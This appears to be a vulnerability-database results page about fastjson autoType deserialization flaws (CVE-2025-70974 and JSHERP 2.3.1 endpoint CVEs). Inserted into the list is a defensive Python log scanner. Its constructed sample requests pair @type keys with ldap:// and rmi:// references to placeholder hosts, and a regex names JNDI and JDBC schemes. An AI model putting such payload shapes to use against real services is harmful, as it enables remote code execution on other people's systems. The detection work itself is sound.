237 matches found
FASTJSON Includes Functionality from Untrusted Control Sphere
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an...
Unsafe Dependency Resolution
Overview: com.alibaba:fastjson is a fast JSON parser/generator for Java. Affected versions of this package are vulnerable to Unsafe Dependency Resolution due to the unsafe implementation of the checkAutoType function. An attacker can execute arbitrary code by supplying a crafted JSON document...
ai.houyi:dorado (>=0.0.1 <=0.0.8), ai.houyi:dorado-core (>=0.0.11 <=0.0.51) +3602 more potentially affected by CVE-2025-70974 via com.alibaba:fastjson (>=1.1.15 <=1.2.47)
com.alibaba:fastjson MAVEN version =1.1.15, =0.0.1, =0.0.11, =0.0.16, =0.0.1, =0.0.14, =0.0.47, =0.0.14, =0.3.0, =3.0.0, =1.0.0, =1.0.1, =1.0.2 and more Source cves: CVE-2025-70974 Source advisory: SNYK:JAVA-COMALIBABA-14908847...
CVE-2025-70974
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an...
CVE-2025-70974
CVE-2025-70974 concerns Alibaba Fastjson before 1.2.48. The issue arises from how autoType is handled: when a JSON document contains an @type key whose value is a Java class name, certain public methods may be invoked, enabling a JNDI injection with an attacker-controlled payload. The vulnerabili...
EUVD-2026-1694
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an...
Fastjson security vulnerability
Fastjson is an open-source, Java-based fast JSON parser/generator from Alibaba. Fastjson versions prior to 1.2.48 contain a security vulnerability that stems from improper handling of autoType, which may lead to JNDI injection attacks...
PT-2026-1957
Name of the Vulnerable Software and Affected Versions: Alibaba Fastjson versions prior to 1.2.48. Description: The software contains a critical deserialization issue due to improper handling of the autoType feature, which could allow for remote code execution. The issue arises when a JSON document...
cc.ddrpa.dorian.polystash:polystash-spring-boot-starter (=1.0.0), com.alibaba.fastjson2:fastjson2-extension (>=2.0.27 <=2.0.62) +39 more potentially affected by CVE-2025-12183 via org.lz4:lz4-pure-java (=1.8.0)
org.lz4:lz4-pure-java MAVEN version =1.8.0 is affected by a known vulnerability. The following packages have a transitive dependency on org.lz4:lz4-pure-java and may be impacted: - cc.ddrpa.dorian.polystash:polystash-spring-boot-starter =1.0.0 - com.alibaba.fastjson2:fastjson2-extension =2.0.27,...
CVE-2025-51744
An issue was discovered in jishenghua JSHERP 2.3.1. The /user/addUser endpoint is vulnerable to fastjson deserialization attacks...
CVE-2025-51746
An issue was discovered in jishenghua JSHERP 2.3.1. The /serialNumber/addSerialNumber endpoint is vulnerable to fastjson deserialization attacks...
CVE-2025-51743
An issue was discovered in jishenghua JSHERP 2.3.1. The /materialCategory/addMaterialCategory endpoint is vulnerable to fastjson deserialization attacks...
CVE-2025-51742
An issue was discovered in jishenghua JSHERP 2.3.1. The /material/getMaterialEnableSerialNumberList endpoint passes the search query parameter directly to parseObject, introducing a Fastjson deserialization vulnerability that can lead to RCE via JDBC payloads...
CVE-2025-51745
An issue was discovered in jishenghua JSHERP 2.3.1. The /role/addcan endpoint is vulnerable to fastjson deserialization attacks...
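The entries above describe one mechanism (an untrusted JSON document whose @type key names a class for fastjson's autoType to instantiate, with JNDI or JDBC references carried in the same object) and the JSHERP entries show the usual way it is reached: a request parameter or body handed straight to parseObject, as with the search parameter of /material/getMaterialEnableSerialNumberList. The following scanner is an added example, not code from this page or from fastjson or JSHERP. It walks request lines for @type keys at any nesting depth, including inside percent-encoded query parameters, and flags ldap://, rmi://, iiop://, dns:// and jdbc: references in the same payload. The log lines are constructed; the endpoint paths are the JSHERP ones listed above, while the class names and hosts are placeholders and none of the payloads is a working gadget chain.

```python
"""Flag fastjson autoType markers in request bodies and query parameters (added example)."""
import json
import re
from urllib.parse import parse_qs, urlsplit

AUTOTYPE_KEY = "@type"
# Schemes a JNDI lookup can be pointed at, plus jdbc: URLs used by driver-based chains.
NETWORK_REF = re.compile(r"(?i)\b(?:ldaps?|rmi|iiop|dns)://[^\s\"'}]+|\bjdbc:[^\s\"'}]+")

# Constructed sample lines, not captured traffic. Endpoints follow the JSHERP entries
# above; the class names and hosts are placeholders, and no payload here is a working
# gadget chain.
SAMPLE_LINES = [
    'POST /user/addUser body={"username":"alice","roleId":3}',
    'POST /user/addUser body={"@type":"java.lang.AutoCloseable","username":"x"}',
    "GET /material/getMaterialEnableSerialNumberList?search="
    "%7B%22%40type%22%3A%22com.example.Gadget%22%2C%22url%22%3A%22ldap%3A%2F%2F10.0.0.5%3A1389%2Fx%22%7D",
    'POST /role/addcan body={"perms":[{"name":"ok"},'
    '{"name":{"@type":"com.example.Gadget","dataSourceName":"rmi://10.0.0.5:1099/x"}}]}',
]


def extract_candidates(line):
    """Split one log line into (method, path, [(source, text), ...]) worth scanning."""
    method, rest = line.split(" ", 1)
    target, _, body = rest.partition(" body=")
    parts = urlsplit(target)
    candidates = []
    # parse_qs percent-decodes, so %40type becomes @type before scanning.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            candidates.append((f"query:{name}", value))
    if body:
        candidates.append(("body", body))
    return method, parts.path, candidates


def find_type_keys(node, path="$"):
    """Yield (json_path, class_name) for every @type key at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == AUTOTYPE_KEY:
                yield path, value
            yield from find_type_keys(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from find_type_keys(value, f"{path}[{index}]")


def scan_text(text):
    """Return (kind, json_path, value) findings for one body or parameter value."""
    findings = []
    try:
        doc = json.loads(text)
    except ValueError:
        doc = None
    if doc is not None:
        for path, cls in find_type_keys(doc):
            findings.append(("autotype", path, str(cls)))
    elif AUTOTYPE_KEY in text:
        # fastjson accepts input a strict parser rejects; flag the raw marker anyway.
        findings.append(("autotype_raw", "?", ""))
    for match in NETWORK_REF.finditer(text):
        findings.append(("network_ref", "?", match.group(0)))
    return findings


def scan_lines(lines):
    """Return one report per line that carries at least one finding."""
    reports = []
    for line in lines:
        method, path, candidates = extract_candidates(line)
        hits = [
            {"source": source, "kind": kind, "path": json_path, "value": value}
            for source, text in candidates
            for kind, json_path, value in scan_text(text)
        ]
        if hits:
            reports.append({"method": method, "endpoint": path, "findings": hits})
    return reports


if __name__ == "__main__":
    for report in scan_lines(SAMPLE_LINES):
        print(json.dumps(report))
```

An @type key in request input is a triage signal, not proof of exploitation, and a scanner like this only sees bodies where they are logged. The fix the entries point at is upgrading fastjson past 1.2.48 and, for the JSHERP endpoints, not handing raw request input to parseObject.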
EUVD-2025-199651
An issue was discovered in jishenghua JSHERP 2.3.1. The /materialCategory/addMaterialCategory endpoint is vulnerable to fastjson deserialization attacks...
EUVD-2025-199649
An issue was discovered in jishenghua JSHERP 2.3.1. The /role/addcan endpoint is vulnerable to fastjson deserialization attacks...
EUVD-2025-199650
An issue was discovered in jishenghua JSHERP 2.3.1. The /user/addUser endpoint is vulnerable to fastjson deserialization attacks...
EUVD-2025-199648
An issue was discovered in jishenghua JSHERP 2.3.1. The /serialNumber/addSerialNumber endpoint is vulnerable to fastjson deserialization attacks...